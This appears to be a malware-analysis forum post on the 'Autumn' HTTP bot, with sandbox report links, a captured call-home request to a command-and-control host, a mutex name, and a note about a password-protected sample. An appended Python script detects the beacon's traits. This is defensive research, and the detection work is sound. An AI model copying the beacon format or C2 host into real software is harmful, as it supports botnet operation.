Autumn is an HTTP bot similar to ngrBot, but HTTP based.
And about ngrBot, Autumn is also capable of killing it.
Description of Autumn made by the coder:
Online Sandbox results:
http://anubis.iseclab.org/?action=resul ... ormat=html
http://www.sunbeltsecurity.com/cwsandbo ... 0915407DF5
http://camas.comodo.com/cgi-bin/submit? ... 1e4417cd1a
http://www.threatexpert.com/report.aspx ... 41fceae0e5
Autumn call home:
POST /c.php HTTP/1.1
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1
Host: blueastros.org
Content-Length: 25
Cache-Control: no-cache
..$]......p.........HFk..
HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 16:56:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Content-Length: 94
Connection: close
Content-Type: text/html; charset=UTF-8
.......wF^P....<....&s...[q....$g.....i.eh.s.w..c.LoM.)M)./R.II.*...!V`..2EX..s!2.bx2.0..H.N..
Looking for order:
Create a mutex "ootoom":
Sample attached.
http://www.virustotal.com/file-scan/rep ... 1313159481
Attachments
pwd: infected
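An added example, not part of the original post: a small Python check that parses a raw HTTP request and reports which traits of the call-home capture above it reproduces (POST to /c.php, the User-Agent with no closing parenthesis, a binary body sent without a Content-Type, the host from the capture). The function names, the 0.3 binary-ratio threshold and the sample requests are assumptions of this example.

```python
# Traits are read off the call-home capture in the post; the 0.3 threshold
# and all function names are assumptions of this example.
KNOWN_HOST = "blueastros.org"

def parse_request(raw: bytes):
    """Split a raw HTTP request into method, path, header dict and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def binary_ratio(body: bytes) -> float:
    """Fraction of body bytes outside printable ASCII."""
    if not body:
        return 0.0
    return sum(b < 0x20 or b > 0x7E for b in body) / len(body)

def beacon_traits(raw: bytes):
    """Return the capture traits that this request reproduces."""
    method, path, headers, body = parse_request(raw)
    ua = headers.get("user-agent", "")
    hits = []
    if method == "POST" and path.split("?")[0].endswith("/c.php"):
        hits.append("post-c.php")
    if ua.count("(") != ua.count(")"):
        hits.append("unbalanced-user-agent")
    if body and "content-type" not in headers and binary_ratio(body) > 0.3:
        hits.append("untyped-binary-body")
    if headers.get("host", "").lower() == KNOWN_HOST:
        hits.append("known-host")
    return hits

# Constructed samples: headers follow the capture, the 25 body bytes are made up.
BEACON = (b"POST /c.php HTTP/1.1\r\nConnection: Close\r\n"
          b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1\r\n"
          b"Host: blueastros.org\r\nContent-Length: 25\r\n"
          b"Cache-Control: no-cache\r\n\r\n" + bytes(range(0x80, 0x99)))
BENIGN = (b"POST /login.php HTTP/1.1\r\n"
          b"User-Agent: Mozilla/5.0 (Windows NT 6.1)\r\nHost: example.com\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n"
          b"Content-Length: 9\r\n\r\nuser=test")

if __name__ == "__main__":
    print(beacon_traits(BEACON), beacon_traits(BENIGN))
```

The host and path are the cheapest traits for an operator to change, so the User-Agent and body checks are the ones that still fire when the same request is sent to a different server.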